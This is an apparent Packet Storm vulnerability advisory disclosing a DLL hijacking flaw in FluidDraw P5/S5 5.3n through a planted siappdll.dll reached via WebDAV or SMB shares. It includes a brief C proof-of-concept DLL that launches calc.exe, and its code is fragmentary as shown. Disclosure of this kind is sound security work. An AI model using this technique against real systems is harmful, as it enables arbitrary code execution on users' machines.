Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution

Type packetstorm
Reporter LiquidWorm
Modified 2016-01-18T00:00:00


Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution  
Vendor: Art Systems Software GmbH | Festo AG & Co. KG  
Product web page: |  
Affected version: FluidDraw S5 Starter 5.3n (5.3.385.0)  
FluidDraw P5 Professional 5.3n (5.3.385.0)  
Summary: Fluiddraw enables the creation of electrical and pneumatic  
circuit diagrams. The tool makes it easier to plan complete systems  
and implement individual components. Users access the Festo catalogue  
and their own imported databases and can thus benefit from evaluation  
functions and created assembly drawings. The software is part of Festo  
Engineering Tools, which provides users with electronic and continuous  
support in the entire process, from planning, selection, design and  
ordering up to delivery and commissioning.  
Desc: FluidDraw suffers from a DLL Hijacking issue. The vulnerability  
is caused due to the application loading libraries (siappdll.dll) in  
an insecure manner. This can be exploited to load arbitrary libraries  
by tricking a user into opening a related application files (.PRJ, .CIRC,  
.CT, .DXF, .SYM) located on a remote WebDAV or SMB share.  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Microsoft Windows 7 Professional SP1 (EN)  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2016-5295  
Advisory URL:  
// gcc -shared -o siappdll.dll exploit.c  
#include <windows.h>  
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)  
return 0;  
int exec()  
WinExec( "calc.exe" , SW_NORMAL );  
return 0;